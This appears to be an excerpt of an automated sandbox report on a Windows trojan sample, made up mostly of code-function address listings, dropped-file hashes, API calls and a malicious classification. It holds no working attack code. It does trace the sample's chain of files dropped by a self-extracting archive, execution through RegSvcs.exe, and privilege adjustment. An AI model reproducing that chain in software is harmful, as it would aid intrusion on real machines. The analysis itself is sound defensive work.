                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F601AA15_2_00F601AA
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F2815815_2_00F28158
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E6A13315_2_00E6A133
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9010015_2_00E90100
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3A11815_2_00F3A118
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F202C015_2_00F202C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F4027415_2_00F40274
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F603E615_2_00F603E6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EAE3F015_2_00EAE3F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F5A35215_2_00F5A352
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E6A33B15_2_00E6A33B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F4E4F615_2_00F4E4F6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F5244615_2_00F52446
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F4442015_2_00F44420
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F6059115_2_00F60591
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E6A54315_2_00E6A543
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA053515_2_00EA0535
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBC6E015_2_00EBC6E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9C7C015_2_00E9C7C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA077015_2_00EA0770
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC475015_2_00EC4750
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ECE8F015_2_00ECE8F0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E868B815_2_00E868B8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA284015_2_00EA2840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EAA84015_2_00EAA840
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA29A015_2_00EA29A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F6A9A615_2_00F6A9A6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB696215_2_00EB6962
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9EA8015_2_00E9EA80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F56BD715_2_00F56BD7
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F5AB4015_2_00F5AB40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E90CF215_2_00E90CF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F40CB515_2_00F40CB5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0C0015_2_00EA0C00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9ADE015_2_00E9ADE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB8DBF15_2_00EB8DBF
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EAAD0015_2_00EAAD00
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3CD1F15_2_00F3CD1F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F5EEDB15_2_00F5EEDB
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F5CE9315_2_00F5CE93
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EB2E9015_2_00EB2E90
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA0E5915_2_00EA0E59
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F5EE2615_2_00F5EE26
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EACFE015_2_00EACFE0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E92FC815_2_00E92FC8
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F1EFA015_2_00F1EFA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F14F4015_2_00F14F40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F42F3015_2_00F42F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EE2F2815_2_00EE2F28
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EC0F3015_2_00EC0F30
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F5F0E015_2_00F5F0E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F570E915_2_00F570E9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA70C015_2_00EA70C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F4F0CC15_2_00F4F0CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EAB1B015_2_00EAB1B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00ED516C15_2_00ED516C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8F17215_2_00E8F172
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F6B16B15_2_00F6B16B
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F412ED15_2_00F412ED
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBB2C015_2_00EBB2C0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA52A015_2_00EA52A0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EE739A15_2_00EE739A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E8D34C15_2_00E8D34C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F5132D15_2_00F5132D
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E9146015_2_00E91460
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F5F43F15_2_00F5F43F
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3D5B015_2_00F3D5B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F5757115_2_00F57571
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F516CC15_2_00F516CC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F5F7B015_2_00F5F7B0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA38E015_2_00EA38E0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F0D80015_2_00F0D800
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA995015_2_00EA9950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBB95015_2_00EBB950
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3591015_2_00F35910
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F4DAC615_2_00F4DAC6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EE5AA015_2_00EE5AA0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F41AA315_2_00F41AA3
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F3DAAC15_2_00F3DAAC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F13A6C15_2_00F13A6C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F57A4615_2_00F57A46
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F5FA4915_2_00F5FA49
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F15BF015_2_00F15BF0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EDDBF915_2_00EDDBF9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBFB8015_2_00EBFB80
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F5FB7615_2_00F5FB76
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F5FCF215_2_00F5FCF2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F19C3215_2_00F19C32
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EBFDC015_2_00EBFDC0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F57D7315_2_00F57D73
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA3D4015_2_00EA3D40
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F51D5A15_2_00F51D5A
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA9EB015_2_00EA9EB0
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E63FD515_2_00E63FD5
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00E63FD215_2_00E63FD2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F5FFB115_2_00F5FFB1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00EA1F9215_2_00EA1F92
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 15_2_00F5FF0915_2_00F5FF09
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DAA5016_3_017DAA50
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DAA5016_3_017DAA50
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_01793E4816_3_01793E48
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DBB2016_3_017DBB20
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DBB2016_3_017DBB20
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_01794F1816_3_01794F18
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DC2F016_3_017DC2F0
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DC2F016_3_017DC2F0
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DC2F216_3_017DC2F2
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DC2F216_3_017DC2F2
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017956E816_3_017956E8
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017956EA16_3_017956EA
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DB2E016_3_017DB2E0
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DB2E016_3_017DB2E0
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017946D816_3_017946D8
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DB2D916_3_017DB2D9
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DB2D916_3_017DB2D9
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017946D116_3_017946D1
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DC79016_3_017DC790
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DC79016_3_017DC790
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_01795B8816_3_01795B88
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DAA5016_3_017DAA50
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DAA5016_3_017DAA50
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_01793E4816_3_01793E48
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DBB2016_3_017DBB20
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DBB2016_3_017DBB20
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_01794F1816_3_01794F18
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DC2F016_3_017DC2F0
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DC2F016_3_017DC2F0
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DC2F216_3_017DC2F2
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DC2F216_3_017DC2F2
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017956E816_3_017956E8
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017956EA16_3_017956EA
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DB2E016_3_017DB2E0
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DB2E016_3_017DB2E0
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017946D816_3_017946D8
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DB2D916_3_017DB2D9
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DB2D916_3_017DB2D9
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017946D116_3_017946D1
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DC79016_3_017DC790
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DC79016_3_017DC790
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_01795B8816_3_01795B88
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DAA5016_3_017DAA50
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DAA5016_3_017DAA50
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_01793E4816_3_01793E48
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DBB2016_3_017DBB20
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DBB2016_3_017DBB20
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_01794F1816_3_01794F18
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DC2F016_3_017DC2F0
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DC2F016_3_017DC2F0
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DC2F216_3_017DC2F2
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DC2F216_3_017DC2F2
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017956E816_3_017956E8
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017956EA16_3_017956EA
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DB2E016_3_017DB2E0
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DB2E016_3_017DB2E0
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017946D816_3_017946D8
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DB2D916_3_017DB2D9
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DB2D916_3_017DB2D9
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017946D116_3_017946D1
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DC79016_3_017DC790
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_017DC79016_3_017DC790
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_3_01795B8816_3_01795B88
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00BDE0BE16_2_00BDE0BE
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00BE803716_2_00BE8037
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00BE200716_2_00BE2007
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00BCE1A016_2_00BCE1A0
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00BFA28E16_2_00BFA28E
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00BE22C216_2_00BE22C2
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00BC225D16_2_00BC225D
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00BDC59E16_2_00BDC59E
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C4C7A316_2_00C4C7A3
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00BFE89F16_2_00BFE89F
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C3291A16_2_00C3291A
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00BF6AFB16_2_00BF6AFB
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C28B2716_2_00C28B27
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00BECE3016_2_00BECE30
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C551D216_2_00C551D2
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00BF716916_2_00BF7169
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00BC924016_2_00BC9240
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00BC949916_2_00BC9499
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00BE172416_2_00BE1724
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00BE1A9616_2_00BE1A96
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00BE7BAB16_2_00BE7BAB
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00BC9B6016_2_00BC9B60
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00BE7DDA16_2_00BE7DDA
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00BE1D4016_2_00BE1D40
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc 98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.msc.exe 98E4F904F7DE1644E519D09371B8AFCBBF40FF3BD56D76CE4DF48479A4AB884B
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: String function: 00C6FD60 appears 40 times
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: String function: 00C70DC0 appears 46 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00EE7E54 appears 102 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00E8B970 appears 275 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00F1F290 appears 105 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00ED5130 appears 58 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: String function: 00F0EA12 appears 86 times
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: String function: 009B57D8 appears 67 times
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: String function: 009B6630 appears 31 times
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: String function: 009B57A5 appears 34 times
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: String function: 00BDFD60 appears 40 times
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: String function: 00BE0DC0 appears 46 times
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5580 -s 80
                Source: uhbrQkYNzx.exe, 00000000.00000002.1506337975.000000000558F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs uhbrQkYNzx.exe
                Source: uhbrQkYNzx.exe, 00000000.00000003.1504703336.000000000558E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenamewscript.exe` vs uhbrQkYNzx.exe
                Source: uhbrQkYNzx.exe, 00000000.00000003.1330681523.00000000073B8000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameAutoIt3.exeB vs uhbrQkYNzx.exe
                Source: uhbrQkYNzx.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: classification engineClassification label: mal100.troj.evad.winEXE@28/48@0/0
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_0099932C GetLastError,FormatMessageW,_wcslen,LocalFree,0_2_0099932C
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CB194F AdjustTokenPrivileges,CloseHandle,10_2_00CB194F
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CB1F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,10_2_00CB1F53
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C2194F AdjustTokenPrivileges,CloseHandle,16_2_00C2194F
                Source: C:\Users\user\AppData\Local\Temp\dsvk\tguujh.msc.exeCode function: 16_2_00C21F53 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,16_2_00C21F53
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CC5B27 SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,10_2_00CC5B27
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CBDC9C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,10_2_00CBDC9C
                Source: C:\Users\user\AppData\Local\Temp\RarSFX0\tguujh.mscCode function: 10_2_00CD4089 CoInitialize,CoUninitialize,CoCreateInstance,IIDFromString,VariantInit,VariantClear,10_2_00CD4089
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCode function: 0_2_009AEBD3 FindResourceW,SizeofResource,LoadResource,LockResource,GlobalAlloc,GlobalLock,CreateStreamOnHGlobal,GdipCreateHBITMAPFromBitmap,GlobalUnlock,GlobalFree,0_2_009AEBD3
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1516:120:WilError_03
                Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5580
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6336:120:WilError_03
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3416:120:WilError_03
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeFile created: C:\Users\user~1\AppData\Local\Temp\RarSFX0Jump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCommand line argument: sfxname0_2_009B454A
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCommand line argument: sfxstime0_2_009B454A
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeCommand line argument: STARTDLG0_2_009B454A
                Source: uhbrQkYNzx.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeFile read: C:\Windows\win.iniJump to behavior
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: uhbrQkYNzx.exeReversingLabs: Detection: 68%
                Source: C:\Users\user\Desktop\uhbrQkYNzx.exeFile read: C:\Users\user\Desktop\uhbrQkYNzx.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\uhbrQkYNzx.exe "C:\Users\user\Desktop\uhbrQkYNzx.exe"
